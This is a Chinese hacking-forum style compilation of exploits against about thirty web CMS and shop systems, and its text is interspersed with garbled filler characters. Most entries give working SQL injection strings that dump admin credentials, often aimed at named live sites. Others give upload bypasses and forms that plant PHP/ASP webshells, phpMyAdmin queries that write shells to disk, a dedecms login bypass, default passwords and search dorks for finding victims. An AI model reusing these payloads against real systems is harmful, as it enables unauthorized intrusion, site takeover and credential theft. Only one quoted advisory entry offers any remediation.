启航企业建站系统 cookie注入漏洞通杀所有版本) `. e5 ?: ]- W9 w
6 {6 w- x8 z! Q! V( u0 K- a3 _直接上exploit:
- z5 e# |* x W, X& Z7 tjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. ?' {* k/ @" F9 N! d" ~8 M" Q
test:http://www.tb11.net/system/xitong/shownews.asp?id=2109 c; l9 w! M% N& b- v' i+ M# V0 e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- H9 D; E/ Z/ {5 ?1 K/ p" `8 ~
Asprain论坛 注册用户 上传图片就可拿到webshell
3 l: K& n, e; R# c$ O6 N9 _3 G9 d; w- g+ U
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。' r9 ]" e5 j) H
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
6 e6 |. d- g! Z: {8 a2.gif 为一小图片文件,一定要小,比如qq表情图片
: Y/ O0 V) P7 y3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
# s8 Y, u4 l, k! Z( K4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了- m2 P0 m' p% R+ q0 p; O
5.q.asp;.gif+ s1 U3 E+ S9 a4 a. a! R1 d
google:Powered by Asprain
: F# ^' P! B' r) F. a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 U* W1 ^# Q; d% p1 s5 k, p; B* M- z3 p$ ^ f6 S3 n
ShopNum1全部系统存在上传漏洞。
: o5 r: C$ I8 J9 O* S8 J* N8 p
' }) j" N `. o$ H) [6 D首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。* U+ o3 a) @% U7 a1 T! i
按说明 提示登录后台。。
( S) u' k3 a* X0 d# S) S在后台功能页面->附件管理->附件列表# L2 ^% a- D/ n* E+ @7 D* i" }1 M" {' o
可以直接上传.aspx 后缀木马* F- k6 m3 t% G7 F0 ]3 P
http://demo.shopnum1.com/upload/20110720083822500.aspx; d9 Q2 ^1 Y8 H" x+ Q; H& ] K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
M t6 D. l2 F5 C. n9 @+ }0 z; ~. C
牛牛CMS中小企业网站管理系统 上传漏洞
4 h" G- f+ s8 l! m8 E0 q1 ~; O2 p5 k( A$ P* G8 c
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。, ~. I. a/ M" f, S+ d
后台:admin/login.asp9 t& ?+ A# K2 f- a$ v
ewebeditor 5.5 Nday% x$ U6 B: r& ~5 _
exp:
6 P# y+ t0 f5 q+ y& h v<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
; b* B+ @7 r% N! e: a& o. B$ n- n<input?type=file?name=uploadfile?size=100><br><br>?. I! @; V0 B! b! g
<input?type=submit?value=upload>?- p' P* t3 Q2 o3 X" O
</form>
+ o$ B+ D0 a/ |; ?+ _, rps:先上传小马.
8 Z( n& I% R# p% s. Dinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏$ b1 S. e5 i: |/ a; R/ C
/ O9 \. ?! K5 @4 ` U' |# z8 R! U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. \( L0 b p- G5 W
& r' D- Y) `0 c: `5 C. R: u K, sYothCMS 遍历目录漏洞 h9 b) z1 l6 r! |2 l2 Z
3 k/ B' |+ q' f# W5 x3 a) f优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
8 I3 D' O) c4 |$ W4 {6 N; Z默认后台:admin/login.asp* `/ ?6 G9 ^. \! M) X4 J
遍历目录:- M0 p# V1 X% h% y) t/ n
ewebeditor/manage/upload.asp?id=1&dir=../
# E8 Q0 h/ n# n0 T/ w T0 U( r' C: z5 Qdata:* E* \0 q7 B7 N8 y" ]+ j* I
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa$ h0 u8 \; B9 L, g& f) `% a
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 Q, y% V9 p6 g5 e: e" `7 ], Z
% x. I+ D( h% I; w+ dNet112企业建站系统 1.0
% V7 h" l/ V B( Z1 ~* w% q! J& Y y& ]3 O
源码简介:# K* `% U9 u, \ ]* N( }2 }
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
4 D y9 p- E8 z5 b9 i添加管理员:
! Q: Z8 v" V- n: y9 ]8 {4 w0 c( ehttp://www.0855.tv/admin/admin.asp?action=add&level=25 b3 s5 Y8 k, a5 G$ T. G
其实加不加都不是很重要,后台文件都没怎么作验证。
* w+ B0 r% e, y2 I上传路径:9 b. c8 }. @6 H1 E
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
. R% b' _. m% Z7 ^% whttp://www.0855.tv/inc/Upfile.asp?Stype=28 f2 d( {" b0 ?; D; }2 Z5 R0 ~
怎么利用自己研究。
: R8 E; {1 [& x! t. n. H遍历目录:* v7 w/ i6 S: e6 |
http://www.0855.tv/admin/upfile.asp?path=../..
8 H g, O1 n5 w( Q- F# v, `+ i如:" r. {/ {# G5 U3 D$ c
http://www.0855.tv/admin/upfile.asp?path=../admin
9 [" y$ R9 E+ ~& Whttp://www.0855.tv/admin/upfile.asp?path=../data+ V! [4 G/ b7 ?8 A$ S; X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( G( k0 K8 R3 | X% A
6 R. C4 |1 j7 |/ A- S易和阳光购物商城通杀 上传漏洞
8 \4 _3 L7 e8 R% x
9 y& L: u6 x# [" L+ e$ r4 e. K前提要求是IIS6.0+asp坏境。. W+ L2 Z2 b. P" P" [, b: y2 n. R+ |
漏洞文件Iheeo_upfile.asp
& B4 |$ q4 x& w0 N# \过滤不严.直接可以iis6.0上传
! b, J7 R7 o( V. I9 u. a+ w5 s把ASP木马改成0855.asp;1.gif
4 ^" f! W8 X9 ^直接放到明小子上传. F; A1 p% V2 B) t
Google搜索:inurl:product.asp?Iheeoid=
# I p# m2 F6 \3 H3 n" P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ?: D- q- g8 q5 ]1 O& ]' X
9 s- J6 R6 D1 ~
phpmyadmin后台4种拿shell方法) b7 ~! L; G* A2 [) [
0 i5 C/ h& v5 g* i3 O- q/ H# G
方法一:
0 n: I) A0 t/ @% p( a$ o* _CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
! H/ d0 w! C8 y7 cINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
& f5 b$ I) T: n Y) @, h. _SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
& d: d: F$ f. R----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
. f, ?0 x2 O" R- r z6 M3 S) {: P一句话连接密码:xiaoma# {, t/ r; ~5 f0 i3 l$ V6 Z: R1 b
方法二:
; N h1 w* ^7 C3 ~' h' W2 DCreate TABLE xiaoma (xiaoma1 text NOT NULL);
9 ~ d0 O6 g" p: Y7 eInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
/ F- c3 Q# J5 W/ Z/ D6 d8 Rselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
$ _+ |* E4 N; D* z5 A3 mDrop TABLE IF EXISTS xiaoma;
5 {$ x9 J3 H1 {1 x& @5 v! `& v) G方法三:
( {' O# F4 T+ j% k9 C* u8 T+ B读取文件内容: select load_file('E:/xamp/www/s.php');
2 c( @3 Q' z- v) U( _9 _写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
v# ?/ a6 d: B2 C) e1 d; qcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ u( f" R0 T8 I7 i' x+ [方法四:! s, L% I+ }: W1 T7 c
select load_file('E:/xamp/www/xiaoma.php');4 P# n5 U& |2 Z8 M
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'/ c( T7 }; O- P; F. Q0 q9 L' v, `
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
% }; G, ]& {- r/ S# q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' F4 b2 v4 f) T
' Z9 f5 o' c0 `0 M4 E- y4 l
传信网络独立开发网站源码0day漏洞# X8 M1 a6 e. }" x& H$ `
, K3 M% G- h7 b4 d. K0 j7 M& ?后台system/login.asp+ y5 O" ^4 _: I. Y# O0 C
进了后台有个ewebeditor
# {+ f4 u6 Y+ G. |" VGoogle 搜索inurl:product1.asp?tyc=
" B# r7 Z7 z" Y) }编辑器漏洞默认后台ubbcode/admin_login.asp1 K% u2 u* [3 `/ ? X5 A% Q. Z
数据库ubbcode/db/ewebeditor.mdb: b9 K u, [4 _) j
默认账号密码yzm 1111116 O9 ^9 r3 O: q# N% d6 R
5 E% }/ E* |! l H9 C0 f
拿webshell方法
- E1 k% l4 w, L3 z/ L登陆后台点击“样式管理”-选择新增样式 ' w" Q9 O B0 a8 _8 r5 p
样式名称:scriptkiddies 随便写 % u( F, w/ _$ e* N" m$ U
路径模式:选择绝对路径 % Z1 _& ^/ l* b% J: P8 u+ o0 y" F
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
: y! U% |- F. y8 J f( a; p8 s图片类型比如就是我们要上传的ASP木马格式) q' \! W- T$ K" `! v
上传路径:/
! |& _" |5 a# Q7 w' o图片限制:写上1000 免的上不了我们的asp木马
7 {! ]# k# L' B9 P; |, E3 o5 D6 D& S上传内容不要写+ F7 C* x p! c; s8 r
可以提交了
, z* L) N+ X1 @样式增加成功! 4 t9 z1 Z! a: t
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
& C, O) G! \8 ^/ X2 ~按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置6 V8 K6 S: h" M: T
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies4 ?) e2 Z' H: n0 J& G9 p
上ASP木马 回车 等到路径/ T: I7 b& j: Z
& Y1 g/ E# ~) C' ]( K后台:system/login.asp3 P; C) j9 L7 b8 L- x# w b8 o4 E
Exp:
3 f2 B, `* a, oand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
( i0 |% N$ ^7 F. D测试:
6 X3 q8 W% Y/ G4 \http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 i" C0 z3 B B4 \/ M/ b
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master! u; k% d! u: T; B' |' u0 @& q T
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- n" t1 y+ r9 t
: M: N" k6 w8 k \: rfoosun 0day 最新注入漏洞. p$ z5 j9 ?$ j" S |" }5 v. j2 t
! ?5 m; B. P4 `: l/ C4 Y
漏洞文件:www.xxx.com/user/SetNextOptions.asp
K) X4 R6 ]& o0 g利用简单的方法:8 n2 A- x6 x5 K- {1 F C" E
暴管理员帐号:, h6 v* P7 A6 j6 T
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin; ]1 ?9 b5 H6 F X: _+ C( ^/ a* g
暴管理员密码:
( x3 L6 S) q2 shttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,. e* h" `9 I' Z* Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ S: Q% @6 t a1 e' P1 Z: \1 ^
* S, j* g" s8 u0 Y! [5 F1 G8 _* b网站程序的版权未知!$ G0 m7 F. n2 t" M/ f; f( V
9 J, ]9 W5 @) c* J" [8 d% b
默认网站数据库:
1 F3 w' z$ S7 F( g4 _2 nwww.i0day.com/data/nxnews.mdb, {1 d6 {+ C# x% c3 c8 a) g
ewebeditor 在线编辑器:/ j& A5 p7 l" ^) K( ]# t6 f' y
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb& R2 k r) l" A5 f0 l# `
登录地址:ewebeditor/admin_login.asp
" ^/ D: Z# c4 z# m b& y默认密码:admin admin E0 B; }) y3 t" ]' x! y4 k3 `2 p
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
( o8 Q3 q5 l% |7 U' X3 m3 e( R" s8 Y S- I8 U1 K! z) C
Sql注入漏洞:
: G- u& L( \2 u* B, h2 Chttp://www.i0day.com/detail.asp?id=12! `5 b. @) G2 I e% \6 f
exp:
; T9 O% n4 J% punion select 1,admin,password,4,5,6,7,8 from admin
_: b, U; K5 g$ T2 P/ p爆出明文帐号/密码
. C- X% q. f H. K
1 n- z9 ], E. |# h% r& `上传漏洞:0 A( E' r4 F3 E. v
后台+upfile.asp6 a# v' i' P: ?/ V; x0 w: C5 ^
如:
3 ]* v( P* ^1 ?6 ~; S1 f, N3 t8 ghttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% S, A2 i4 j* V8 @' C% O$ r) E" `
shell的地址:网址+后台+成功上传的马$ @5 ?* n: r$ p' J. ?4 V9 O; c
google:inurl:news.asp?lanmuName=8 _: P+ D# J9 q3 `
------------------------------------------------------------------------------------------------------------------------------------------------------------------------: R: o' j; N1 E2 c3 x
; [5 W2 `! u' A. R: q
dedecms最新0day利用不进后台直接拿WEBSHELL6 w4 r; a* R, P$ ?! @( K
X) ?% Q* @- A拿webshell的方法如下:9 |9 m( o5 _ \' V* U% Y
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
- w& w* a# T7 U/ d" F前题条件,必须准备好自己的dede数据库,然后插入数据:- U- J% N9 @3 A5 U6 d" M
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
3 b6 s+ y6 ]& i' h; {8 r
* e+ i' ?* A6 e' l1 O. u再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。3 H7 C: J2 r* u$ a3 N' S! I* \% N7 Y' O
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
% z" g" h- c, d% r( Q# p<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
8 B& ]1 I5 L9 A5 z) p0 q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />; r* v1 q" Z% J5 t" j
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 k* o5 z" ?" u+ n/ g<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) T' L- B# b3 R, J$ P. H
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" V4 X0 C# n: n5 u
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
) V l' @8 d# j/ q<input type="text" value="true" name="nocache" style="width:400">
) S- q3 n. P q* W# S4 O$ F<input type="submit" value="提交" name="QuickSearchBtn"><br />
* V2 A& K9 |' [2 E: J</form>2 W0 _7 e/ C/ N2 x' [& I. L: O+ t$ {
<script>
4 ?' ~ c9 Y2 Ffunction addaction()
0 C* `1 E* l- w+ E; p{
3 x2 ?; c' U7 {5 t0 w) Y( Odocument.QuickSearch.action=document.QuickSearch.doaction.value;
5 F6 [# w9 g# K& M* L4 S}
- N" k2 h4 C! H/ b0 h3 [</script>
! D& d* u- M" T) P) v* C* P-----------------------------------------------------------------------------------------------------------------------------------------------, H7 h! }9 C6 J4 B( u' b
! ? c) _. R! y% Z* \; p) I7 Mdedecms织梦暴最新严重0day漏洞9 o% Z* F, J- r4 b
bug被利用步骤如下:
; D' x- b, q* N0 _% F( vhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ J, s/ _$ t- X5 H# s) j, K2 r把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
3 u7 y% K3 Q b D, d! J+ _ D, v-------------------------------------------------------------------------------------------------------------------------------------------7 }, k& Y0 F5 k1 j) o
; u: f3 b* s+ h8 J
多多淘宝客程序上传漏洞 $ ~" k9 y0 g! z4 w# w7 j$ u8 g
漏洞页面:/ ]$ Y( s7 |+ u8 W$ I, v! C
admin\upload_pic.php
+ |" X: t+ ]2 l P传送门:
! r0 k* a2 m! F& |" Xhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1, e# I# q6 g7 f; |1 n* q
PS:copy张图片马 直接 xxx.php 上传抓包地址!
% V4 K- S+ `) C+ Y( l------------------------------------------------------------------------------------------------------------------------------------------------------
e( z! z0 E: b, x& R5 }' M& t
- ] t/ C+ @: Y. h无忧公司系统ASP专业版后台上传漏洞, C5 F( }; N& I' S$ @
漏洞文件 后台上传% W9 w/ C/ b4 |) Z+ l/ f; E
admin/uploadPic.asp2 T" p( J$ O" l9 n& p2 u+ _
漏洞利用 这个漏洞好像是雷池的) [! O0 K9 Z9 Z8 r
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
2 \, h3 k! R& H6 F等到的webshell路径:2 q5 R" y. ?4 f8 p3 X
/UploadFiles/scriptkiddies.asp;_2.gif; ~5 o( ^: P7 E2 ]! V. p
---------------------------------------------------------------------------------------------------------------------------------------------------
7 v2 D; q: J4 Q
( W) e3 H2 D/ U) t- @9 u1 m0 g住哪酒店分销联盟系统2010$ ~& x4 Q( R) |! n( s' j( i
Search:
. Q% B0 `' C0 _2 P5 ]' _8 U5 \inurl:index.php?m=hotelinfo
) Y+ f1 L4 P; D$ Qhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin* a5 C! S8 ]2 P7 p. Q3 |5 E+ ]
默认后台:index.php?m=admin/login
6 Z* W7 i2 E* {/ W b1 ^8 |--------------------------------------------------------------------------------------------------------------------------------------------------9 n/ K3 k& ^ Y3 _. v2 u/ z8 m
" w l6 M i( |% H( D7 f# L u% ~inurl:info_Print.asp?ArticleID=
5 p* A+ @- u! A后台 ad_login.asp
7 H) q5 }4 I* y! B9 X* p爆管理员密码:, N" p0 b7 F8 b# c0 y2 L
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin5 j% _3 L3 m6 [+ e3 X1 ]
------------------------------------------------------------------------------------------------------------------------------------------------------------
$ ?* p1 G' O b6 t" l7 t$ p. F1 u9 j% U2 j9 ~' _
搜索框漏洞!
# z! U u' D7 m A%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='* F0 x7 r* D6 G7 A/ D8 z
--------------------------------------------------------------------------------------------------------------------------------------------------------( d+ Y& P: b& k V
+ ^5 E0 f# M: U# w5 @: @关键字:
! ?* B$ r+ _0 X! Ainurl:/reg_TemletSel.asp?step=2
/ M4 V0 i5 o) j' v% p" l+ v或者
, Q! H5 x- N) I( \( C电子商务自助建站--您理想的助手
* g& A( r8 I1 S$ `! m6 [5 c-------------------------------------------------------------------------------------------------------------------------------------------------
s4 b7 f9 S' R& S2 |
! B3 C8 `6 N( ^1 P6 v" xiGiveTest 2.1.0注入漏洞8 i( e2 T1 F B% C( Y
Version: <= 2.1.04 G: M4 A7 ~! j a
# Homepage: http://iGiveTest.com/* L: U, L$ k, X# Q- E3 f
谷歌关键字: “Powered by iGiveTest”
9 B( _6 M$ A* m0 J" b3 |7 v随便注册一个帐号。然后暴管理员帐号和密码
' i) E+ U9 }; K+ @& Nhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
0 n+ q& T/ Q: U------------------------------------------------------------------------------------------------------------------------------------------------: E f; \/ b/ H( k
" ~. l, w, H+ p; ACKXP网上书店注入漏洞
* L& S5 |: |3 P工具加表:shop_admin 加字段:admin
9 Y& V' c5 p6 R+ }! S2 G后台:admin/login.asp
! m2 q0 d( f3 b* I登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 J$ k& x, s F! a2 ]inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
* t4 D$ A0 Q2 M$ M- K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 E3 j) V1 B3 Q( @0 [* }: s9 M( B; s; a$ L! S" c
段富超个人网站系统留言本写马漏洞. n# v# g1 W0 K
源码下载:http://www.mycodes.net/24/2149.htm
3 F! W; G$ I6 m- aaddgbook.asp 提交一句话。$ l+ q/ H* {* t; V4 I. k
连接: http://www.xxxx.tv/date/date3f.asp
7 z. U- I, _2 t% e. A4 B1 A( j: Agoogle:为防批量,特略!7 i3 @9 m8 l4 J9 G0 f4 t
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 i5 o2 F3 ?4 E. i
* I% r8 G' E# y智有道专业旅游系统v1.0 注入及列目录漏洞
6 A, f6 P/ W6 n1 \# j2 x" } l2 m默认后台路径:/admin/login.asp
' F- m5 o* x/ {7 o& u7 J默认管理员:admin8 h3 _0 @* d/ ]
默认密码:1234565 r# W+ b3 v5 ?3 o) [4 s# X
SQL EXP Tset:3 T: y( y" E: y: `" d. L6 y
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
. `+ j: k: |; g* d------------------------------------------------------------------------------------------------------------------------------------------------------------------------
u0 F0 n/ v) K/ m4 ?8 V$ X1 [5 L7 ~. I; V7 D3 u+ R
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
6 V$ b- f: r, l' g6 n. xEXP:
+ Z$ W! ]7 _: S9 r9 \" [9 q! N<title>eWebeditoR3.8 for php任意文件上EXP</title>: L* _7 F5 s, }9 _4 {) d7 C
<form action="" method=post enctype="multip% X G2 b: F* R' ?: _2 {
art/form-data">
; c* V- _3 G5 ?, J) ]* r<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
' S0 n: W, F9 N$ Z. k3 w9 Y- SURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 2 ?& n/ U& v0 a- z% W- y' B" B3 x2 X
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> - I5 Y t# H" e4 A* k
file:<input type=file name="uploadfile"><br> : q( M. Y; U% X, ^9 `% Z, h
<input type=button value=submit onclick=fsubmit()>
9 N" }6 E% C0 n* ~/ r</form><br>
6 g0 S- Z% D) o, I3 v) Y6 G<script>
- v- R; \$ |- U2 N# F. Dfunction fsubmit(){
' v( x8 J+ |6 uform = document.forms[0];
" J1 s. G# L3 Tform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 3 d1 L) l! O# g, e" z- E l. p% z
alert(form.action); ! m: E, ?, Q' D; b- z1 Q F
form.submit();
: M5 l% |, r! ?+ Y* L} % S# J8 H9 B8 o
</script>
& H" z# y8 x6 }9 |注意修改里面ewebeditor的名称还有路径。# m( e" h( Z: Z5 c. T, S4 `- S
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% ]) l: I; ~5 d- t$ f% k
2 m/ u( D& D' y' N: ]4 R/ `提交’时提示ip被记录 防注入系统的利用
3 w7 ~0 G/ Z) ?! c3 t; v. t网址:http://www.xxx.com/newslist.asp?id=122′+ T; D0 \! B! c# w
提示“你的操作已被记录!”等信息。$ g4 W) R: y( p9 H# Y4 F) }
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。3 t1 e) q2 d# W% @" m- M
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. k) }" k% l, t* U
: S- ~/ N7 c' o: E: p$ J) v; L西部商务网站管理系统 批量拿shell-0day
) S5 L( R# s, w' W( U$ D这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
& H/ q) O6 x* Y4 C7 f1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' L+ C2 Y) y" `; R' U1 q* s- I2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合5 t3 ?. N6 P8 @3 p( F$ ^& Z4 y
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂0 Y5 v( n4 i, U( L+ k0 r
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 d, N" F! ~$ D2 n: O
7 S6 D/ @% ?( L% R2 E
JspRun!6.0 论坛管理后台注入漏洞* {) u5 X" r' t; ]5 u- r
9 j) f: c0 }( {SEBUG-ID:20787 发布时间:2011-04-30 影响版本:2 K" B9 [. x1 ~ y( U# w. t' b2 {
JspRun!6.0
' e+ N$ g' ^: {- G3 \& M+ T; i漏洞描述:/ X8 q- J5 ?! x% J& y+ d9 X! {
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
2 y' F7 r1 @4 [8 h; I, O在处理后台提交的文件中ForumManageAction.java第1940行
9 v4 X1 N% f) j2 ~# X7 DString export = request.getParameter("export");//直接获取,没有安全过滤) S0 c! B9 O" Z5 _0 ]
if(export!=null){
% i5 _/ Y' r4 ?5 r2 L4 g! KList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...- ?4 y% g, r0 g; y$ `
if(styles==null||styles.size()==0){/ A" Y/ y+ \% R% m. r6 v U6 Z$ [( H4 u
<*参考4 m, N" Y7 Q( Z( T Z2 u0 e8 g. x4 q
nuanfan@gmail.com! g; O1 U7 g* L" C1 j" R5 m" w
*> SEBUG安全建议:
: q+ J: a, E1 dwww.jsprun.net2 a6 P0 z7 b7 o* M& [
(1)安全过滤变量export: }1 E5 D. T* K% X
(2)在查询语句中使用占位符2 c, j% x5 g; G$ {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 ]! D( n8 ]0 n3 E- F' y
( t9 g& D8 F# d0 q: }( B9 X乌邦图企业网站系统 cookies 注入( b4 B s, s# J8 N5 P* F
# Z4 P v! U. C, S
程序完整登陆后台:/admin/login.asp5 x1 q" R; \5 b( D- }9 a
默认登陆帐号:admin 密码:admin888
& G" g7 i( W2 k& O" F语句:(前面加个空格)- z; A$ @2 R+ d
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin7 D. u8 m+ l! | r2 ?: U/ h( `
或者是16个字段:7 ^# ~0 D6 g8 V z: h# F
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin. u8 }9 L: W! W5 ~0 Q
爆不出来自己猜字段。5 Z" z. f, I- x0 C
注入点:http://www.untnt.com/shownews.asp?=88
7 {) f% ~! B7 B, U5 Bgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp5 \: `- `, }+ e
关键字:
1 |$ q2 m& B5 _- G& yinurl:shownews?asp.id=
3 Q( _0 \, ]- X-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, x1 B9 |; e* @4 i( V3 M2 n. |8 q x- p9 X
CKXP网上书店注入漏洞' i6 X. \0 h& o" \
& a2 r* W9 q7 U- s9 q. h9 [
工具加表:shop_admin 加字段:admin* r0 d8 a$ k, s6 Z
后台:admin/login.asp
* y: ?% Z2 z% n) ?) v9 t- @" ~登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
) B, g- j x9 f' einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; a% z2 G. M6 ]1 u G, [( s---------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 A5 v; R$ |5 p5 _' [5 Y4 U
# d$ h# z' v5 O& S5 G: [2 x5 C; p# u
YxShop易想购物商城4.7.1版本任意文件上传漏洞
! K0 k' x# Y6 U0 q) E& P$ W% R0 U% I# s! K
http://xxoo.com/controls/fckedit ... aspx/connector.aspx; [. x- W* x& D
